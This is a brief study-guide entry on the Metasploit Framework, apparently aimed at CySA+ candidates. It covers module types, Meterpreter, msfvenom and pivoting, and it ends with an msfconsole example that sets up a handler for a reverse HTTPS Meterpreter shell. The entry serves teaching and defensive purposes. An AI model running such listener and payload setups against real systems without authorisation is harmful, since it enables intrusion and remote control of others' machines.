Metasploit Framework

Rapid7

The most widely used penetration testing and exploitation framework.

Vulnerability Management · Freemium · Platform / Suite · Learning · Cross-platform

Cyber Kill Chain & Defender Lifecycle

Attacker — Kill Chain
1 Reconnaissance
2 Weaponization
3 Delivery
4 Exploitation
5 Installation
6 Command & Control
7 Actions on Objectives
Defender — IR Lifecycle
8 Detection / Monitoring
9 Containment & Eradication
10 Post-incident Forensics

Description

Metasploit Framework is the leading open-source exploitation framework. Even though most CySA+ tasks are defensive, candidates must understand Metasploit because it is the canonical tool attackers use, and its modules drive a large share of detection signatures.

Core concepts:

  • Module types: exploits vs payloads vs encoders vs auxiliary modules vs post modules.
  • Meterpreter — the post-exploitation in-memory agent.
  • msfvenom — payload generator (PE, ELF, JSP, ASPX, raw shellcode).
  • db_nmap — automatic ingestion of Nmap results into the workspace.
  • Pivoting and routing through compromised hosts.

Use cases

  • Validating that a discovered vulnerability is actually exploitable
  • Generating IOC-rich payloads for purple-team detection engineering
  • Recognising Meterpreter staging traffic in PCAP analysis
  • Authorised internal red-team exercises

Example

msfconsole -q
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_https
set LHOST 10.10.14.5
set LPORT 443
run -j